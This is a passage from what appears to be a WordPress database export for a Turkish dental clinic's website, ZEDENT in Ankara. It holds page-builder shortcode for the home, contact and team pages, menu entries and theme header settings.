gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"5000\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2018-08-01 15:26:36', '2018-08-01 12:26:36', '', 0, 'http://impreza.us-themes.net/', 0, 'page', '', 0),
(9, 1, '2018-07-12 11:56:39', '2018-07-12 08:56:39', '[vc_row height=\"auto\" width=\"full\"][vc_column][us_gmaps marker_address=\"\" marker_text=\"JTNDY2VudGVyJTNFWkVERU5UJTIwJTNDYnIlM0VBJUM0JTlGJUM0JUIxeiUyMHZlJTIwRGklQzUlOUYlMjBTYSVDNCU5RmwlQzQlQjElQzQlOUYlQzQlQjElMjBQb2xpa2xpbmklQzQlOUZpJTNDJTJGY2VudGVyJTNF\" zoom=\"17\" latitude=\"39.922046\" longitude=\"32.853018\" add_markers=\"1\" markers=\"%5B%5D\"][/vc_column][/vc_row][vc_row gap=\"20\"][vc_column width=\"1/3\"][vc_column_text]\r\n<h3>Sosyal Medya</h3>\r\n[/vc_column_text][us_social_links size=\"22px\" items=\"%5B%7B%22type%22%3A%22facebook%22%2C%22url%22%3A%22https%3A%2F%2Fwww.facebook.com%2FZe-Dent-A%25C4%259F%25C4%25B1z-Ve-Di%25C5%259F-Sa%25C4%259Fl%25C4%25B1%25C4%259F%25C4%25B1-Poliklini%25C4%259Fi-1050669254966662%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22instagram%22%2C%22url%22%3A%22https%3A%2F%2Fwww.instagram.com%2Fze_dent%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%5D\"][us_separator][vc_column_text]\r\n<h3>İletişim Bilgileri</h3>\r\n[/vc_column_text][us_iconbox icon=\"fas|map-marker-alt\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"İzmir 1 Caddesi Aydın Apartmanı No: 33/22 Kızılay / ANKARA\" title_tag=\"div\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 425 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903124251656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 232 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903122321656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"ze-dent@hotmail.com\" title_tag=\"div\" link=\"url:mailto%3Aze-dent%40hotmail.com|||\"][/us_iconbox][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<h3>İletişim Formu</h3>\r\nSoru ve önerilerini aşağıdaki formu doldurarak bize iletebilirsiniz.[/vc_column_text][us_cform receiver_email=\"ze-dent@hotmail.com\" name_field=\"shown\" captcha_field=\"required\" button_style=\"outlined\"]I consent to the processing and storage of my personal data[/us_cform][/vc_column][/vc_row]', 'İletişim', '', 'publish', 'closed', 'closed', '', 'iletisim', '', '', '2018-07-18 13:10:04', '2018-07-18 10:10:04', '', 0, 'http://impreza.us-themes.net/pages/contact/', 0, 'page', '', 0),
(1194, 1, '2013-09-03 12:39:41', '2013-09-03 12:39:41', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6550\" name=\"ZEKİ ERDOĞAN\" role=\"Kurucu - Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6539\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6540\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row][vc_row content_placement=\"middle\" height=\"auto\"][vc_column][us_separator type=\"fullwidth\" size=\"small\" thick=\"3\" text=\"Dental Asistanlarımız\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][us_person image=\"6546\" name=\"SEVİNÇ PEKBAK\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][us_person image=\"6545\" name=\"SONGÜL EVCİ\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'publish', 'closed', 'closed', '', 'hekimlerimiz', '', '', '2018-08-01 15:25:42', '2018-08-01 12:25:42', '', 0, 'http://impreza.us-themes.net/pages/team/', 0, 'page', '', 0),
(2253, 1, '2013-12-12 12:01:54', '2013-12-12 12:01:54', '[vc_row][vc_column][us_grid post_type=\"us_portfolio\" columns=\"4\" items_gap=\"4px\" items_quantity=\"\" items_layout=\"6226\"][/vc_column][/vc_row]', 'Hizmetlerimiz', '', 'publish', 'closed', 'closed', '', 'hizmetlerimiz', '', '', '2018-07-13 18:26:34', '2018-07-13 15:26:34', '', 0, 'http://impreza.us-themes.net/?page_id=2253', 0, 'page', '', 0),
(3728, 1, '2018-07-12 14:14:01', '2018-07-12 11:14:01', '[vc_row][vc_column][us_grid columns=\"3\" items_quantity=\"\" pagination=\"infinite\" items_layout=\"6224\" img_size=\"us_600_400_crop\"][/vc_column][/vc_row]', 'Ağız ve Diş Sağlığı', '', 'publish', 'closed', 'closed', '', 'agiz-ve-dis-sagligi', '', '', '2018-07-13 14:02:14', '2018-07-13 11:02:14', '', 0, 'http://impreza.us-themes.net/?page_id=3728', 0, 'page', '', 0),
(5467, 1, '2016-12-27 16:32:00', '2016-12-27 16:32:00', '[vc_row height=\"small\" color_scheme=\"footer-bottom\" el_class=\"align_center_xs\"][vc_column][vc_column_text]\r\n<p style=\"text-align: center;\">© 2018 ZEDENT Ağız ve Diş Sağlığı Polikliniği | <a href=\"http://www.markavinci.com\" target=\"_blank\" rel=\"noopener\">Markavinci</a></p>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Site Footer', '', 'publish', 'closed', 'closed', '', 'site-footer', '', '', '2018-07-16 16:23:01', '2018-07-16 13:23:01', '', 0, 'http://impreza5.us-themes.net/us_footer/default-footer/', 0, 'us_footer', '', 0),
(5774, 1, '2017-01-31 14:57:35', '2017-01-31 14:57:35', '[vc_row content_placement=\"middle\" height=\"full\" valign=\"center\"][vc_column][us_iconbox icon=\"fas|exclamation-triangle\" size=\"100px\"][/us_iconbox][us_separator size=\"small\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">404 Sayfa Bulunamadı!</h1>\r\n<p style=\"text-align: center;\">Gitmeye çalıştığınız sayfa silinmiş yada adresi değişmiş olabilir\r\nNavigasyon menülerini kullanabilir yada arama yapabilirsiniz.</p>\r\n[/vc_column_text][/vc_column][/vc_row]', '404 Error', '', 'publish', 'closed', 'closed', '', 'error-404', '', '', '2018-07-17 13:34:40', '2018-07-17 10:34:40', '', 0, 'http://impreza5.us-themes.net/?page_id=5774', 0, 'page', '', 0),
(5796, 1, '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 'Introduction', '', 'publish', 'closed', 'closed', '', 'introduction', '', '', '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 0, 'http://www.ze-dent.com/2018/07/12/introduction/', 1, 'nav_menu_item', '', 0),
(5797, 1, '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 'Our Team', '', 'publish', 'closed', 'closed', '', 'our-team', '', '', '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 0, 'http://www.ze-dent.com/2018/07/12/our-team/', 3, 'nav_menu_item', '', 0),
(5798, 1, '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 'Our Clients', '', 'publish', 'closed', 'closed', '', 'our-clients', '', '', '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 0, 'http://www.ze-dent.com/2018/07/12/our-clients/', 4, 'nav_menu_item', '', 0),
(5799, 1, '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 'Our History', '', 'publish', 'closed', 'closed', '', 'our-history', '', '', '2018-07-12 17:22:10', '2018-07-12 14:22:10', '', 0, 'http://www.ze-dent.com/2018/07/12/our-history/', 2, 'nav_menu_item', '', 0),
(5932, 1, '2017-07-07 16:35:00', '2017-07-07 16:35:00', '{\"default\":{\"options\":{\"breakpoint\":900,\"orientation\":\"hor\",\"sticky\":true,\"scroll_breakpoint\":\"100\",\"transparent\":\"0\",\"width\":300,\"elm_align\":\"center\",\"shadow\":\"thin\",\"top_show\":1,\"top_height\":\"36\",\"top_sticky_height\":0,\"top_fullwidth\":0,\"middle_height\":\"120\",\"middle_sticky_height\":\"60\",\"middle_fullwidth\":0,\"elm_valign\":\"top\",\"bg_img\":\"\",\"bg_img_wrapper_start\":\"\",\"bg_img_size\":\"cover\",\"bg_img_repeat\":\"repeat\",\"bg_img_position\":\"top center\",\"bg_img_attachment\":1,\"bgimage_wrapper_end\":\"\",\"bottom_show\":0,\"bottom_height\":\"36\",\"bottom_sticky_height\":40,\"bottom_fullwidth\":0},\"layout\":{\"top_left\":[\"text:2\",\"text:1\",\"text:3\"],\"top_center\":[],\"top_right\":[\"socials:1\"],\"middle_left\":[\"image:1\"],\"middle_center\":[],\"middle_right\":[\"menu:1\",\"search:1\"],\"bottom_left\":[],\"bottom_center\":[],\"bottom_right\":[],\"hidden\":[]}},\"tablets\":{\"options\":{\"breakpoint\":900,\"orientation\":\"hor\",\"sticky\":true,\"scroll_breakpoint\":\"80\",\"transparent\":0,\"width\":300,\"elm_align\":\"center\",\"shadow\":\"thin\",\"top_show\":1,\"top_height\":36,\"top_sticky_height\":0,\"top_fullwidth\":0,\"middle_height\":80,\"middle_sticky_height\":60,\"middle_fullwidth\":0,\"elm_valign\":\"top\",\"bg_img\":\"\",\"bg_img_wrapper_start\":\"\",\"bg_img_size\":\"cover\",\"bg_img_repeat\":\"repeat\",\"bg_img_position\":\"top center\",\"bg_img_attachment\":1,\"bgimage_wrapper_end\":\"\",\"bottom_show\":0,\"bottom_height\":50,\"bottom_sticky_height\":50,\"bottom_fullwidth\":0},\"layout\":{\"top_left\":[\"text:2\",\"text:1\",\"text:3\"],\"top_center\":[],\"top_right\":[\"socials:1\"],\"middle_left\":[\"image:1\"],\"middle_center\":[],\"middle_right\":[\"menu:1\",\"search:1\"],\"bottom_left\":[],\"bottom_center\":[],\"bottom_right\":[],\"hidden\":[]}},\"mobiles\":{\"options\":{\"breakpoint\":600,\"orientation\":\"hor\",\"sticky\":true,\"scroll_breakpoint\":\"50\",\"transparent\":0,\"width\":300,\"elm_align\":\"center\",\"shadow\":\"thin\",\"top_show\":0,\"top_height\":36,\"top_sticky_height\":0,\"top_fullwidth\":0,\"middle_height\":50,\"middle_sticky_height\":50,\"middle_fullwidth\":0,\"elm_valign\":\"top\",\"bg_img\":\"\",\"bg_img_wrapper_start\":\"\",\"bg_img_size\":\"cover\",\"bg_img_repeat\":\"repeat\",\"bg_img_position\":\"top center\",\"bg_img_attachment\":1,\"bgimage_wrapper_end\":\"\",\"bottom_show\":0,\"bottom_height\":50,\"bottom_sticky_height\":50,\"bottom_fullwidth\":0},\"layout\":{\"top_left\":[\"text:2\",\"text:1\",\"text:3\"],\"top_center\":[],\"top_right\":[\"socials:1\"],\"middle_left\":[\"image:1\"],\"middle_center\":[],\"middle_right\":[\"menu:1\",\"search:1\"],\"bottom_left\":[],\"bottom_center\":[],\"bottom_right\":[],\"hidden\":[]}},\"data\":{\"image:1\":{\"img\":\"6557|full\",\"link\":{\"url\":\"/\",\"target\":\"\"},\"img_transparent\":\"\",\"heading_1\":\"\",\"height\":\"80\",\"height_tablets\":\"70\",\"height_mobiles\":\"40\",\"heading_2\":\"\",\"height_sticky\":\"50\",\"height_sticky_tablets\":\"60\",\"height_sticky_mobiles\":\"40\",\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"},\"text:2\":{\"text\":\"0.312 425 16 56\",\"font\":null,\"text_style\":[],\"link\":{\"url\":\"tel:+903124251656\",\"target\":\"\"},\"icon\":\"fas|phone\",\"size\":\"14\",\"size_tablets\":\"13\",\"size_mobiles\":\"13\",\"color\":\"\",\"wrap\":\"0\",\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"},\"text:3\":{\"text\":\"ze-dent@hotmail.com\",\"font\":null,\"text_style\":[],\"link\":{\"url\":\"mailto:ze-dent@hotmail.com\",\"target\":\"\"},\"icon\":\"fas|envelope\",\"size\":\"14\",\"size_tablets\":\"13\",\"size_mobiles\":\"13\",\"color\":\"\",\"wrap\":\"0\",\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"},\"socials:1\":{\"items\":[{\"type\":\"facebook\",\"url\":\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\",\"icon\":\"fab|apple\",\"title\":\"\",\"color\":\"#999999\"},{\"type\":\"instagram\",\"url\":\"https://www.instagram.com/ze_dent\",\"icon\":\"fab|apple\",\"title\":\"\",\"color\":\"#999999\"}],\"style\":\"default\",\"color\":\"text\",\"hover\":null,\"size\":\"18\",\"size_tablets\":\"18\",\"size_mobiles\":\"18\",\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"},\"menu:1\":{\"source\":\"header-menu\",\"font\":null,\"text_style\":[],\"font_size\":\"18\",\"indents\":\"30\",\"vstretch\":\"1\",\"hover_effect\":\"underline\",\"dropdown_arrow\":\"0\",\"dropdown_effect\":\"height\",\"dropdown_font_size\":\"16\",\"dropdown_width\":\"0\",\"mobile_width\":\"1020\",\"mobile_layout\":\"dropdown\",\"mobile_effect_p\":\"afl\",\"mobile_effect_f\":\"aft\",\"mobile_font_size\":\"18\",\"mobile_dropdown_font_size\":\"15\",\"mobile_align\":\"left\",\"mobile_behavior\":\"1\",\"mobile_icon_size\":\"20\",\"mobile_icon_size_tablets\":\"20\",\"mobile_icon_size_mobiles\":\"20\",\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"},\"search:1\":{\"icon\":\"fas|search\",\"icon_size\":\"18\",\"icon_size_tablets\":\"18\",\"icon_size_mobiles\":\"18\",\"text\":\"Ne Aramıştınız? ...\",\"layout\":\"fullscreen\",\"width\":\"240\",\"width_tablets\":\"200\",\"product_search\":0,\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"},\"text:1\":{\"text\":\"0.312 232 16 56\",\"font\":null,\"text_style\":[],\"link\":{\"url\":\"tel:+903122321656\",\"target\":\"\"},\"icon\":\"fas|phone\",\"size\":\"14\",\"size_tablets\":\"13\",\"size_mobiles\":\"13\",\"color\":\"\",\"wrap\":\"0\",\"hide_for_sticky\":\"0\",\"hide_for_not_sticky\":\"0\",\"design_options\":{\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\",\"margin_top_tablets\":\"\",\"margin_right_tablets\":\"\",\"margin_bottom_tablets\":\"\",\"margin_left_tablets\":\"\",\"border_top_tablets\":\"\",\"border_right_tablets\":\"\",\"border_bottom_tablets\":\"\",\"border_left_tablets\":\"\",\"padding_top_tablets\":\"\",\"padding_right_tablets\":\"\",\"padding_bottom_tablets\":\"\",\"padding_left_tablets\":\"\",\"margin_top_mobiles\":\"\",\"margin_right_mobiles\":\"\",\"margin_bottom_mobiles\":\"\",\"margin_left_mobiles\":\"\",\"border_top_mobiles\":\"\",\"border_right_mobiles\":\"\",\"border_bottom_mobiles\":\"\",\"border_left_mobiles\":\"\",\"padding_top_mobiles\":\"\",\"padding_right_mobiles\":\"\",\"padding_bottom_mobiles\":\"\",\"padding_left_mobiles\":\"\"},\"el_class\":\"\"}}}', 'Site Header', '', 'publish', 'closed', 'closed', '', 'site-header', '', '', '2018-11-30 18:57:13', '2018-11-30 15:57:13', '', 0, 'http://impreza.us-themes.com/us_header/site-header/', 0, 'us_header', '', 0),
(6124, 1, '2018-07-12 17:22:31', '2018-07-12 14:22:31', ' ', '', '', 'publish', 'closed', 'closed', '', '6124', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/2018/07/12/6124/', 29, 'nav_menu_item', '', 0),
(6125, 1, '2018-07-12 17:22:31', '2018-07-12 14:22:31', '', '<i class=\"fas fa-home\"></i>', '', 'publish', 'closed', 'closed', '', '6125', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/2018/07/12/6125/', 1, 'nav_menu_item', '', 0),
(6137, 1, '2018-07-12 17:22:32', '2018-07-12 14:22:32', ' ', '', '', 'publish', 'closed', 'closed', '', '6137', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/2018/07/12/6137/', 2, 'nav_menu_item', '', 0),
(6138, 1, '2018-07-12 17:22:33', '2018-07-12 14:22:33', ' ', '', '', 'publish', 'closed', 'closed', '', '6138', '', '', '2018-07-12 17:22:33', '2018-07-12 14:22:33', '', 0, 'http://www.ze-dent.com/2018/07/12/6138/', 5, 'nav_menu_item', '', 0),
(6139, 1, '2018-07-12 17:22:33', '2018-07-12 14:22:33', ' ', '', '', 'publish', 'closed', 'closed', '', '6139', '', '', '2018-07-12 17:22:33', '2018-07-12 14:22:33', '', 0, 'http://www.ze-dent.com/2018/07/12/6139/', 1, 'nav_menu_item', '', 0),
(6156, 1, '2018-07-12 17:22:34', '2018-07-12 14:22:34', ' ', '', '', 'publish', 'closed', 'closed', '', '6156', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/2018/07/12/6156/', 4, 'nav_menu_item', '', 0),
(6188, 1, '2018-07-12 17:22:38', '2018-07-12 14:22:38', ' ', '', '', 'publish', 'closed', 'closed', '', 'blog-2', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/2018/07/12/blog-2/', 28, 'nav_menu_item', '', 0),
(6208, 1, '2018-07-12 17:29:44', '2018-07-12 14:29:44', '', 'favicon', '', 'inherit', 'closed', 'closed', '', 'favicon', '', '', '2018-07-12 17:29:44', '2018-07-12 14:29:44', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/favicon.png', 0, 'attachment', 'image/png', 0),
(6209, 1, '2018-07-12 17:29:48', '2018-07-12 14:29:48', '', 'zedent_logo', '', 'inherit', 'closed', 'closed', '', 'zedent_logo', '', '', '2018-07-12 17:29:48', '2018-07-12 14:29:48', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/zedent_logo.png', 0, 'attachment', 'image/png', 0),
(6210, 1, '2018-07-12 18:08:07', '2018-07-12 15:08:07', '<p>[vc_row height=\"auto\" width=\"full\"][vc_column][us_gmaps marker_address=\"\" marker_text=\"JTNDY2VudGVyJTNFWkVERU5UJTIwJTNDYnIlM0VBJUM0JTlGJUM0JUIxeiUyMHZlJTIwRGklQzUlOUYlMjBTYSVDNCU5RmwlQzQlQjElQzQlOUYlQzQlQjElMjBQb2xpa2xpbmklQzQlOUZpJTNDJTJGY2VudGVyJTNF\" zoom=\"17\" latitude=\"39.922046\" longitude=\"32.853018\" add_markers=\"1\" markers=\"%5B%5D\"][/vc_column][/vc_row][vc_row gap=\"20\"][vc_column width=\"1/3\"][vc_column_text]<br />\n<h3>Sosyal Medya</h3>\n<p>[/vc_column_text][us_social_links size=\"22px\" 